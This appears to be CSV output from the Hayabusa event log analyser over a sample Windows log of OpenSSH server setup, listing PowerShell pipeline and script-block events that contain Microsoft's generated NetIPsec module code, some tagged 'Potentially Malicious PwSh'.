+09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Sync-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.092 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Update-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'c",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'c",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"im:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecMainModeRule' -Alias '*' function Get-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, 